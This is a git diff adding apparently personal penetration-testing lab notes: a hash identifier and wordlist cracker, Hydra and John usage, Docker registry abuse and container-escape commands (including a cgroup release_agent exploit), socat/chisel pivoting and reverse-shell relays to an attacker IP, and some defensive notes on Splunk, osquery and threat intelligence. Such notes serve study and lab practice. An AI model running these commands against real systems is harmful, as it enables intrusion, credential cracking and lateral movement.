Tiger128(h); Tiger128HMAC(h); Tiger160(h); Tiger160HMAC(h); Tiger192(h); Tiger192HMAC(h); Whirlpool(h); WhirlpoolHMAC(h); XOR32(h); md5passsalt(h); md5saltmd5pass(h); md5saltpass(h); md5saltpasssalt(h); md5saltpassusername(h); md5saltmd5pass(h); md5saltmd5passsalt(h); md5saltmd5passsalt(h); md5saltmd5saltpass(h); md5saltmd5md5passsalt(h); md5username0pass(h); md5usernameLFpass(h); md5usernamemd5passsalt(h); md5md5pass(h); md5md5passsalt(h); md5md5passmd5salt(h); md5md5saltpass(h); md5md5saltmd5pass(h); md5md5usernamepasssalt(h); md5md5md5pass(h); md5md5md5md5pass(h); md5md5md5md5md5pass(h); md5sha1pass(h); md5sha1md5pass(h); md5sha1md5sha1pass(h); md5strtouppermd5pass(h); sha1passsalt(h); sha1saltpass(h); sha1saltmd5pass(h); sha1saltmd5passsalt(h); sha1saltsha1pass(h); sha1saltsha1saltsha1pass(h); sha1usernamepass(h); sha1usernamepasssalt(h); sha1md5pass(h); sha1md5passsalt(h); sha1md5sha1pass(h); sha1sha1pass(h); sha1sha1passsalt(h); sha1sha1passsubstrpass03(h); sha1sha1saltpass(h); sha1sha1sha1pass(h); sha1strtolowerusernamepass(h)
|
||||||
|
|
||||||
|
if len(jerar)==0:
|
||||||
|
|
||||||
|
print("\n Not Found.")
|
||||||
|
elif len(jerar)>2:
|
||||||
|
jerar.sort()
|
||||||
|
print("\nPossible Hashs:")
|
||||||
|
print("[+] "+str(algorithms[jerar[0]]))
|
||||||
|
print("[+] "+str(algorithms[jerar[1]]))
|
||||||
|
print("\nLeast Possible Hashs:")
|
||||||
|
for a in range(int(len(jerar))-2):
|
||||||
|
print("[+] "+str(algorithms[jerar[a+2]]))
|
||||||
|
else:
|
||||||
|
jerar.sort()
|
||||||
|
print("\nPossible Hashs:")
|
||||||
|
for a in range(len(jerar)):
|
||||||
|
print("[+] "+str(algorithms[jerar[a]]))
|
||||||
|
|
||||||
|
first = None
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
print("\n\n\tBye!")
|
||||||
|
exit()
|
|
@ -0,0 +1,20 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
import hashlib
|
||||||
|
import pyfiglet
|
||||||
|
|
||||||
|
print(pyfiglet.figlet_format("md5 cracker"))
|
||||||
|
|
||||||
|
wordlist_location = str(input("Wordlist file location: "))
|
||||||
|
hash_input = str(input("Enter hash to be cracked: "))
|
||||||
|
|
||||||
|
with open(wordlist_location, 'rb') as _f:
|
||||||
|
for line in _f.readlines():
|
||||||
|
line = line.strip()
|
||||||
|
hash_ob = hashlib.sha256(line)
|
||||||
|
#hash_ob = hashlib.md5(line)
|
||||||
|
hashed_pass = hash_ob.hexdigest()
|
||||||
|
print(line)
|
||||||
|
if hashed_pass == hash_input:
|
||||||
|
print("Password found: " + line.decode())
|
||||||
|
exit(0)
|
|
@ -0,0 +1,2 @@
|
||||||
|
ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 5e1d37c82e8f5fc3588c10d9920c07ae6a71a0ce
|
|
@ -0,0 +1,8 @@
|
||||||
|
# John The Ripper
|
||||||
|
|
||||||
|
# Usage
|
||||||
|
|
||||||
|
* Example
|
||||||
|
```
|
||||||
|
john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=raw-sha256 --fork=2
|
||||||
|
```
|
|
@ -0,0 +1,37 @@
|
||||||
|
# Hydra usage
|
||||||
|
|
||||||
|
## Examples
|
||||||
|
|
||||||
|
* HTTP post form
|
||||||
|
```sh
|
||||||
|
hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
|
||||||
|
```
|
||||||
|
* HTTP basic auth
|
||||||
|
```sh
|
||||||
|
hydra -l bob -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.10.167.239 http-get /protected
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|Command|Description|
|
||||||
|
|-------|-----------|
|
||||||
|
|`hydra -P <wordlist> -v <ip> <protocol>`|Brute force against a protocol of your choice|
|
||||||
|
|`hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>`|You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)|
|
||||||
|
|`hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>`|Attack a Windows Remote Desktop with a password list.|
|
||||||
|
|`hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`|Craft a more specific request for Hydra to brute force.|
|
||||||
|
|
||||||
|
## Parameter
|
||||||
|
|
||||||
|
|Option|Decription|
|
||||||
|
|------|----------|
|
||||||
|
|-l|Single username|
|
||||||
|
|-P|Indicates use the following wordlist|
|
||||||
|
|http-post-form|indicates the method|
|
||||||
|
|/login url|the login URL|
|
||||||
|
|:username|the form field where the username is entered|
|
||||||
|
|^USER^|tells Hydra to use the username from -l|
|
||||||
|
|password|the formfield where the password is entered|
|
||||||
|
|^PASS^|tells Hydra to use the wordlist from -P|
|
||||||
|
|Login|indicates to Hydra the login failed message|
|
||||||
|
|Login failed|is the login failure message that the form returns|
|
||||||
|
|F=incorrect|If this word appears on the page, login failed|
|
||||||
|
|-V| verbose|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 9f1820d33e0051cdfc5572f8b24700bb2430f9df
|
|
@ -0,0 +1,3 @@
|
||||||
|
# Shell Scripting
|
||||||
|
|
||||||
|
[Bash Cheatsheet](https://devhints.io/bash)
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit c7d121b3d72aeaded26d5731819afaf49b686df6
|
|
@ -0,0 +1,117 @@
|
||||||
|
# Docker Vulnerabilities
|
||||||
|
|
||||||
|
## Abusing Registry
|
||||||
|
* [Registry Doc](https://docs.docker.com/registry/spec/api/)
|
||||||
|
* Registry is a json API endpoint
|
||||||
|
* Private registry added in `/etc/docker/daemon.json`
|
||||||
|
* Can be found by nmap as a service
|
||||||
|
|
||||||
|
### Enumeration
|
||||||
|
* General query
|
||||||
|
```sh
|
||||||
|
curl http://test.com:5000/v2/_catalog`
|
||||||
|
```
|
||||||
|
* List tags
|
||||||
|
```sh
|
||||||
|
curl http://test.com:5000/v2/<REPO>/<APP>/tags/list
|
||||||
|
```
|
||||||
|
* `history` section of the json object contains commands executed at build phase. May contain sensitive data like passwords.
|
||||||
|
```sh
|
||||||
|
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Reversing Docker Images
|
||||||
|
* [Dive](https://github.com/wagoodman/dive)
|
||||||
|
```sh
|
||||||
|
dive <IMAGE-ID>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Uploading Images to Registry
|
||||||
|
* Ever image has a `latest` tag
|
||||||
|
* Upload modified docker image as `latest`
|
||||||
|
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
|
||||||
|
|
||||||
|
## RCE via Exposed Docker Daemon
|
||||||
|
* Users inside the `docker` group may open tcp socket through docker
|
||||||
|
* `nmap -sV -p- <IP> -vv` to find exposed tcp sockets via docker
|
||||||
|
* Confirming via `curl http://test.com:2375/version` on open docker port
|
||||||
|
* Execute commands on socket
|
||||||
|
```sh
|
||||||
|
docker -H tcp://test.com:2375 ps
|
||||||
|
docker -H tcp://test.com:2375 exec <container> <cmd>
|
||||||
|
```
|
||||||
|
|
||||||
|
* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
|
||||||
|
|
||||||
|
## Escape Container via Exposed Docker Daemon
|
||||||
|
* Looking for exposed docker sockets
|
||||||
|
```sh
|
||||||
|
find / -name "*sock"
|
||||||
|
groups
|
||||||
|
```
|
||||||
|
|
||||||
|
* Mount the host volume and chroot to it, need alpine image
|
||||||
|
```sh
|
||||||
|
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
|
||||||
|
```
|
||||||
|
|
||||||
|
## Shared Namespaces
|
||||||
|
* Namespaces
|
||||||
|
* Cgroups
|
||||||
|
* OverlayFS
|
||||||
|
|
||||||
|
* Requires root inside the container
|
||||||
|
|
||||||
|
* Execute command
|
||||||
|
```sh
|
||||||
|
nsenter --target 1 --mount sh
|
||||||
|
```
|
||||||
|
|
||||||
|
## Misconfiguration
|
||||||
|
* Privileged container connect to the host directly, not through the docker engine
|
||||||
|
* Execution of bins on the host from libs inside the container is possible
|
||||||
|
```sh
|
||||||
|
capsh --print
|
||||||
|
```
|
||||||
|
* `man capabilities`
|
||||||
|
|
||||||
|
* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)
|
||||||
|
|
||||||
|
* Exploit
|
||||||
|
```sh
|
||||||
|
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
|
||||||
|
echo 1 > /tmp/cgrp/x/notify_on_release
|
||||||
|
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
|
||||||
|
echo "$host_path/exploit" > /tmp/cgrp/release_agent
|
||||||
|
echo '#!/bin/sh' > /exploit
|
||||||
|
echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
|
||||||
|
chmod a+x /exploit
|
||||||
|
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
||||||
|
```
|
||||||
|
## Dirty c0w
|
||||||
|
https://github.com/dirtycow/dirtycow.github.io
|
||||||
|
|
||||||
|
## runC
|
||||||
|
[CVE-2019-5736](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/)
|
||||||
|
|
||||||
|
## Securing a Container
|
||||||
|
* Least Privileges
|
||||||
|
* Seccomp
|
||||||
|
* Securing Registry via TLS
|
||||||
|
|
||||||
|
## Checking if you are inside a container
|
||||||
|
* Low process count
|
||||||
|
```sh
|
||||||
|
ps aux
|
||||||
|
```
|
||||||
|
|
||||||
|
* `.dockerenv` in `/`
|
||||||
|
```sh
|
||||||
|
cd / && ls -lah
|
||||||
|
```
|
||||||
|
|
||||||
|
* cgroups contain docker names
|
||||||
|
```sh
|
||||||
|
pwd /proc/1
|
||||||
|
cat cgroups
|
||||||
|
```
|
|
@ -0,0 +1,11 @@
|
||||||
|
# GitTools
|
||||||
|
|
||||||
|
* extract commits from repo
|
||||||
|
```sh
|
||||||
|
./extractor.sh <repo_with_.git> <targetdir>
|
||||||
|
```
|
||||||
|
* List `commit-meta.txt` files from all commits
|
||||||
|
```sh
|
||||||
|
separator="======================================="; for i in $(ls); do printf "\n\n$separator\n\033[4;1m$i\033[0m\n$(cat $i/commit-meta.txt)\n"; done; printf "\n\n$separator\n\n\n"
|
||||||
|
```
|
||||||
|
* Compare hashes of the commits. The one without a parent is the oldest one.
|
|
@ -0,0 +1,47 @@
|
||||||
|
# Threat Intelligence
|
||||||
|
Data must be analyzed to be considered threat intelligence. Once analyzed and actionable, then it becomes threat intelligence. The data needs context around to become intel.
|
||||||
|
|
||||||
|
|
||||||
|
__Cyber Thread Intelligence (CTI)__ is a precautionary measure that companies use or contribute to so that other corporations do not get hit with the same attacks. Of course, adversaries change their TTPs all the time so the TI landscape is constantly changing.
|
||||||
|
|
||||||
|
Vendors and corporations will sometimes share their collected CTI in what are called __ISACs__ or __Information Sharing and Analysis Centers__. __ISACs__ collect various indicators of an adversary that other corporations can use as a precaution against adversaries.
|
||||||
|
|
||||||
|
|
||||||
|
Threat Intelligence is also broken up into three different types.
|
||||||
|
|
||||||
|
* Strategic
|
||||||
|
* Assist senior management make informed decisions specifically about the security budget and strategies.
|
||||||
|
|
||||||
|
* Tactical
|
||||||
|
* Interacts with the TTPs and attack models to identify adversary attack patterns.
|
||||||
|
|
||||||
|
* Operational
|
||||||
|
* Interact with IOCs and how the adversaries operationalize.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## Advance Persistent Threats (APTs)
|
||||||
|
* https://www.fireeye.com/current-threats/apt-groups.html
|
||||||
|
|
||||||
|
## TTP
|
||||||
|
TTP is an acronym for Tactics, Techniques, and Procedures, but what does each of these terms mean?
|
||||||
|
|
||||||
|
* The __Tactic__ is the adversary's goal or objective.
|
||||||
|
* The __Technique__ is how the adversary achieves the goal or objective.
|
||||||
|
* The __Procedure__ is how the technique is executed.
|
||||||
|
|
||||||
|
TI is an acronym for Threat Intelligence. Threat Intelligence is an overarching term for all collected information on adversaries and TTPs. You will also commonly hear CTI or Cyber Threat Intelligence which is just another way of saying Threat Intelligence.
|
||||||
|
|
||||||
|
## Indicator of Compromise
|
||||||
|
* __IOCs__ is an acronym for __Indicators of Compromise__, the indicators for malware and adversary groups. Indicators can include file hashes, IPs, names, etc.
|
||||||
|
|
||||||
|
## Information Sharing and Analysis Centers (ISACs)
|
||||||
|
According to the National Council of __ISACs__, "Information Sharing and Analysis Centers (ISACs) are member-driven organizations, delivering all-hazards threat and mitigation information to asset owners and operators". ISACs can be community-centered or vendor-specific. ISACs include CTI from threat actors as well as mitigation information in the form of IOCs, YARA rules, etc. ISACs maintain situational awareness by sharing and collaborating to maintain CTI, through a National Council of ISACs.
|
||||||
|
|
||||||
|
* ISACs
|
||||||
|
* [US-CERT](https://us-cert.cisa.gov/)
|
||||||
|
* [AlienVault OTX](https://otx.alienvault.com/)
|
||||||
|
* [ThreatConnect](https://threatconnect.com/)
|
||||||
|
* [MISP](https://www.misp-project.org/)
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,65 @@
|
||||||
|
# Osquery
|
||||||
|
|
||||||
|
* [Documentation](https://osquery.readthedocs.io/en/stable/)
|
||||||
|
* [Schema Docs](https://osquery.io/schema/4.7.0/)
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
* `.help` is the overiew
|
||||||
|
|
||||||
|
### List available tables
|
||||||
|
```sh
|
||||||
|
.tables
|
||||||
|
```
|
||||||
|
* Specify via `.tables <tablename>`
|
||||||
|
|
||||||
|
### Show schema
|
||||||
|
```sh
|
||||||
|
.schema <table_name>
|
||||||
|
```
|
||||||
|
* Show schema for foreign operating systems via `--enable_foreign`
|
||||||
|
|
||||||
|
### Queries
|
||||||
|
|
||||||
|
* Select
|
||||||
|
```sql
|
||||||
|
select * from <table>;
|
||||||
|
select * <attr>,<attr> from <table>;
|
||||||
|
```
|
||||||
|
|
||||||
|
* UPDATE and DELETE is possible on run-time tables
|
||||||
|
|
||||||
|
* JOIN
|
||||||
|
```sql
|
||||||
|
SELECT pid, name, path FROM osquery_info JOIN processes USING (pid);
|
||||||
|
```
|
||||||
|
|
||||||
|
* Where clause operators
|
||||||
|
* `=` [equal]
|
||||||
|
* `<>` [not equal]
|
||||||
|
* `>, >=` [greater than, greater than or equal to]
|
||||||
|
* `<, <=` [less than or less than or equal to]
|
||||||
|
* `BETWEEN` [between a range]
|
||||||
|
* `LIKE` [pattern wildcard searches]
|
||||||
|
* `%` [wildcard, multiple characters]
|
||||||
|
* `_` [wildcard, one character]
|
||||||
|
|
||||||
|
* Matching wildcard rules
|
||||||
|
* `%`: Match all files and folders for one level.
|
||||||
|
* `%%`: Match all files and folders recursively.
|
||||||
|
* `%abc`: Match all within-level ending in "abc".
|
||||||
|
* `abc%`: Match all within-level starting with "abc".
|
||||||
|
|
||||||
|
## Remote Queries via Frontend
|
||||||
|
* [Repo](https://github.com/fleetdm/fleet.git)
|
||||||
|
|
||||||
|
## Extensions
|
||||||
|
* [osquery-extensions](https://github.com/trailofbits/osquery-extensions)
|
||||||
|
* [osq-ext-bin](https://github.com/polylogyx/osq-ext-bin)
|
||||||
|
|
||||||
|
### Yara
|
||||||
|
```sql
|
||||||
|
select * from yara where sigfile='<sigfile>' and path like '/home/%%';
|
||||||
|
```
|
||||||
|
* [Docs](https://osquery.readthedocs.io/en/stable/deployment/yara/)
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,18 @@
|
||||||
|
# Security Information and Event Management (SIEM)
|
||||||
|
|
||||||
|
* [Varonis](https://www.varonis.com/blog/what-is-siem/)
|
||||||
|
|
||||||
|
* Threat detection
|
||||||
|
* Investigation
|
||||||
|
* Time to respond
|
||||||
|
* Some other SIEM features:
|
||||||
|
* Basic security monitoring
|
||||||
|
* Advanced threat detection
|
||||||
|
* Forensics & incident response
|
||||||
|
* Log collection
|
||||||
|
* Normalization
|
||||||
|
* Notifications and alerts
|
||||||
|
* Security incident detection
|
||||||
|
* Threat response workflow
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,63 @@
|
||||||
|
# Splunk
|
||||||
|
|
||||||
|
|
||||||
|
## Splunk Bar
|
||||||
|
* Messages
|
||||||
|
* Settings
|
||||||
|
* Activity
|
||||||
|
* Help
|
||||||
|
* Find
|
||||||
|
|
||||||
|
## Search & Reporting
|
||||||
|
* Tip: If you want to land into the Search app upon login automatically, you can do so by editing the user-prefs.conf file.
|
||||||
|
```sh
|
||||||
|
C:\Program Files\Splunk\etc\apps\user-prefs\default\user-prefs.conf
|
||||||
|
/opt/splunk/etc/apps/user-pref/default/user-prefs.conf
|
||||||
|
```
|
||||||
|
* [Docs](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Aboutthesearchapp)
|
||||||
|
* [Start searching](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Startsearching)
|
||||||
|
* [Time range picker](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Aboutthetimerangepicker)
|
||||||
|
* [Field to search](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Usefieldstosearch)
|
||||||
|
* [Use field lookups](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Usefieldlookups)
|
||||||
|
* [Search field lookups](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Searchwithfieldlookups)
|
||||||
|
* [Splunk Regex](https://docs.splunk.com/Documentation/Splunk/8.1.2/Knowledge/AboutSplunkregularexpressions)
|
||||||
|
|
||||||
|
* Tabs
|
||||||
|
* Event
|
||||||
|
* Patterns
|
||||||
|
* Statistics
|
||||||
|
* Visualization
|
||||||
|
|
||||||
|
## Adding Data
|
||||||
|
* [Adding Data Docs](https://docs.splunk.com/Documentation/Splunk/8.1.2/Data/Getstartedwithgettingdatain#Use_apps_to_get_data_in)
|
||||||
|
|
||||||
|
* `Settings > Data > Data Inputs` contains further sources
|
||||||
|
* Add data after that via `Add Data`
|
||||||
|
|
||||||
|
## Queries
|
||||||
|
* [Metadata](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Metadata)
|
||||||
|
* [Metalore](https://www.splunk.com/blog/2017/07/31/metadata-metalore.html)
|
||||||
|
```sh
|
||||||
|
| metadata type=sourcetypes index=botsv2 | eval firstTime=strftime(firstTime,"%Y-%m-%d %H:%M:%S") | eval lastTime=strftime(lastTime,"%Y-%m-%d %H:%M:%S") | eval recentTime=strftime(recentTime,"%Y-%m-%d %H:%M:%S") | sort - totalCount
|
||||||
|
```
|
||||||
|
|
||||||
|
* Examples
|
||||||
|
* Filtering HTTP sites visited for found IP
|
||||||
|
```sh
|
||||||
|
index="botsv2" 10.0.2.101 sourcetype="stream:HTTP" | dedup site | table site
|
||||||
|
```
|
||||||
|
|
||||||
|
## Sigma
|
||||||
|
* [Sigma Repo](https://github.com/Neo23x0/sigma)
|
||||||
|
* [TA-Sigma-Searches](https://github.com/dstaulcu/TA-Sigma-Searches)
|
||||||
|
* [Conversion](https://uncoder.io/)
|
||||||
|
* E.g. : `sigma: APT29` as input
|
||||||
|
|
||||||
|
## Dashboard
|
||||||
|
```sh
|
||||||
|
source="<source>" | top limit=5 EventID
|
||||||
|
```
|
||||||
|
* Visualization > choose Chart > "Save As" (top right) > DashboardName
|
||||||
|
|
||||||
|
## Alerting
|
||||||
|
* [Workflow](https://docs.splunk.com/Documentation/SplunkCloud/8.1.2012/Alert/AlertWorkflowOverview)
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 0090ba2e51b7503c3245081894c0fc87b696f941
|
|
@ -0,0 +1,42 @@
|
||||||
|
# Methodology
|
||||||
|
|
||||||
|
* Steps
|
||||||
|
* Reconnaissance
|
||||||
|
* Enumeration/Scanning
|
||||||
|
* Gaining Access
|
||||||
|
* Privilege Escalation
|
||||||
|
* Covering Tracks
|
||||||
|
* Reporting
|
||||||
|
|
||||||
|
## Reconnaissance
|
||||||
|
* Duck / SearX / metacrawler / google
|
||||||
|
* Wikipedia
|
||||||
|
* [Shodan.io](http://www.shodan.io)
|
||||||
|
* PeopleFinder.com
|
||||||
|
* who.is
|
||||||
|
* sublist3r
|
||||||
|
* hunter.io
|
||||||
|
* builtwith.com
|
||||||
|
* wappalyzer
|
||||||
|
|
||||||
|
## Enumeration
|
||||||
|
* nmap
|
||||||
|
* nikto
|
||||||
|
* gobuster
|
||||||
|
* dirbuster
|
||||||
|
* metasploit
|
||||||
|
* enum4linux / linpeas / winpeas / linenum
|
||||||
|
|
||||||
|
## Exploitation
|
||||||
|
|
||||||
|
## Privilege Escalation
|
||||||
|
|
||||||
|
## Covering Tracks
|
||||||
|
|
||||||
|
## Reporting
|
||||||
|
* Includes
|
||||||
|
* Vulnerabilities
|
||||||
|
* Criticality
|
||||||
|
* Description
|
||||||
|
* Countermeasures
|
||||||
|
* Finding summary
|
|
@ -0,0 +1,144 @@
|
||||||
|
# Pivoting
|
||||||
|
|
||||||
|
* Tunnelling/Proxying
|
||||||
|
* Port Forwarding
|
||||||
|
|
||||||
|
## Enumeration
|
||||||
|
### Using material found on the machine and preinstalled tools
|
||||||
|
* `arp -a`
|
||||||
|
* `/etc/hosts` or `C:\Windows\System32\drivers\etc\hosts`
|
||||||
|
* `/etc/resolv.conf`
|
||||||
|
* `ipconfig /all`
|
||||||
|
* `nmcli dev show`
|
||||||
|
### Statically compiled tools](https://github.com/andrew-d/static-binaries.git)
|
||||||
|
### Scripting Techniques
|
||||||
|
```sh
|
||||||
|
for i in {1..255}; do (ping -c 1 192.168.0.${1} | grep "bytes from" &); done
|
||||||
|
for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done
|
||||||
|
```
|
||||||
|
* Using local tools through a proxy like `nmap`
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
### Enumerating a network using native and statically compiled tools
|
||||||
|
### Proxychains / FoxyProxy
|
||||||
|
* Proxychains
|
||||||
|
```sh
|
||||||
|
proxychains nc <IP> <PORT>
|
||||||
|
```
|
||||||
|
* Use `/etc/proxychains.conf` or `./proxychains.conf`containing:
|
||||||
|
```
|
||||||
|
[ProxyList]
|
||||||
|
# add proxy here ...
|
||||||
|
# meanwhile
|
||||||
|
# defaults set to "tor"
|
||||||
|
socks4 127.0.0.1 9050
|
||||||
|
# proxy_dns
|
||||||
|
```
|
||||||
|
* FoxyProxy
|
||||||
|
|
||||||
|
### SSH port forwarding and tunnelling (primarily Unix)
|
||||||
|
* LocalPortForwarding
|
||||||
|
```sh
|
||||||
|
ssh -L <LocalPort>:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN
|
||||||
|
```
|
||||||
|
* Dynamic Port Forwarding
|
||||||
|
```sh
|
||||||
|
ssh -D <Port> <user>@<Jumpserver> -fN
|
||||||
|
```
|
||||||
|
* Reverse Proxy
|
||||||
|
```sh
|
||||||
|
ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP(local) -i KEYFILE -fN
|
||||||
|
```
|
||||||
|
### plink.exe (Windows)
|
||||||
|
* [latest version](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)
|
||||||
|
```sh
|
||||||
|
cmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<Jumpserver> -i <key> -N
|
||||||
|
```
|
||||||
|
* Key generation
|
||||||
|
```sh
|
||||||
|
puttygen <keyfile> -o key.ppk
|
||||||
|
```
|
||||||
|
|
||||||
|
### Socat
|
||||||
|
* Reverse shell on target via
|
||||||
|
```sh
|
||||||
|
./socat tcp-l:8000 tcp:<attacker-IP>:443 &
|
||||||
|
```
|
||||||
|
* Attacking bind shell
|
||||||
|
```sh
|
||||||
|
sudo nc -lvnp 443
|
||||||
|
```
|
||||||
|
* Relay via Jumpserver
|
||||||
|
```sh
|
||||||
|
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
|
||||||
|
```
|
||||||
|
* Quiet Port Forwarding
|
||||||
|
* On attacker
|
||||||
|
```sh
|
||||||
|
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
|
||||||
|
```
|
||||||
|
* On relay server
|
||||||
|
```sh
|
||||||
|
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
|
||||||
|
```
|
||||||
|
* Open `localhost:8000`
|
||||||
|
* Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
|
||||||
|
|
||||||
|
### Chisel
|
||||||
|
* **Does not require SSH on target**
|
||||||
|
* Reverse Proxy
|
||||||
|
* Bind port on attacker
|
||||||
|
```sh
|
||||||
|
./chisel server -p <ListeningPort> --reverse &
|
||||||
|
```
|
||||||
|
* Reverse port on target/proxy
|
||||||
|
```sh
|
||||||
|
./chisel client <attacker-IP>:<attacker-Port> R:socks &
|
||||||
|
```
|
||||||
|
* `proxychains.conf` contains
|
||||||
|
```sh
|
||||||
|
[ProxyList]
|
||||||
|
socks5 127.0.0.1 <Listening-Port>
|
||||||
|
```
|
||||||
|
|
||||||
|
* Forward SOCKS Proxy
|
||||||
|
* Proxy/compromised machine
|
||||||
|
```sh
|
||||||
|
./chisel server -p <Listen-Port> --socks5
|
||||||
|
```
|
||||||
|
* On attacker
|
||||||
|
```sh
|
||||||
|
./chisel client <target-IP>:<target-Port> <proxy-Port>:socks
|
||||||
|
```
|
||||||
|
* Remote Port Forward
|
||||||
|
* On attacker
|
||||||
|
```sh
|
||||||
|
./chisel server -p <Listen-Port> --reverse &
|
||||||
|
```
|
||||||
|
* On forwarder
|
||||||
|
```sh
|
||||||
|
./chisel client <attacker-IP>:<attackerListen-Port> R:<Forwarder-Port>:<target-IP>:<target-Port> &
|
||||||
|
```
|
||||||
|
* Local Port Forwarding
|
||||||
|
* On proxy
|
||||||
|
```sh
|
||||||
|
./chisel server -p <Listen-Port>
|
||||||
|
```
|
||||||
|
* On attacker
|
||||||
|
```sh
|
||||||
|
./chisel client <Listen-IP>:<Listen-Port> <attacker-IP>:<target-IP>:<target-Port>
|
||||||
|
```
|
||||||
|
|
||||||
|
### sshuttle
|
||||||
|
* `pip install sshuttle`
|
||||||
|
* `sshuttle -r <user>@<target> <subnet/CIDR>`
|
||||||
|
* or automatically determined
|
||||||
|
```sh
|
||||||
|
sshuttle -r <user>@<target> -N
|
||||||
|
```
|
||||||
|
* Key based auth
|
||||||
|
```sh
|
||||||
|
sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
|
||||||
|
```
|
||||||
|
* Exclude servers via `-x`, for example the target/gateway server
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit ce332b5b08d7249c21e121697b7b48d6414c2a18
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 0dc0ff255a4bb07d2c2664ef6220137f7e40bb75
|
|
@ -0,0 +1,4 @@
|
||||||
|
# Command and Control
|
||||||
|
|
||||||
|
* [Matrix](https://www.thec2matrix.com/)
|
||||||
|
* [bcsecurity](https://www.bc-security.org/) maintains Empire 4
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue